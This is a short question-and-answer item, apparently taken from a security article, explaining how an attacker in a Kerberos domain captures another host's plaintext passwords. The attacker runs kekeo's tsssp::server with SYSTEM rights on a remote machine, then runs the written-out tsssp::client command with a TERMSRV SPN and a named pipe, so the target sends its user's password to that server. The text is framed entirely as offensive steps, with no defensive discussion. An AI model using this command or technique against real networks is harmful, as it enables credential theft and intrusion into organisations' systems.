How can an attacker remotely capture plaintext passwords from another host in a domain environment using this technique?

In a domain environment using Kerberos, the attacker sets up a `tsssp::server` on a remote machine with SYSTEM privileges. Then, from the target host (as a regular user), they run `tsssp::client /target:TERMSRV/COMPUTER01.test.com /pipe:\\COMPUTER01.test.com\pipe\kekeo_tsssp_endpoint` to connect to that remote server. This causes the target host to send its current user's plaintext password over the network. The SPN used corresponds to the domain computer account. For more details, refer to the exploitation section of the article.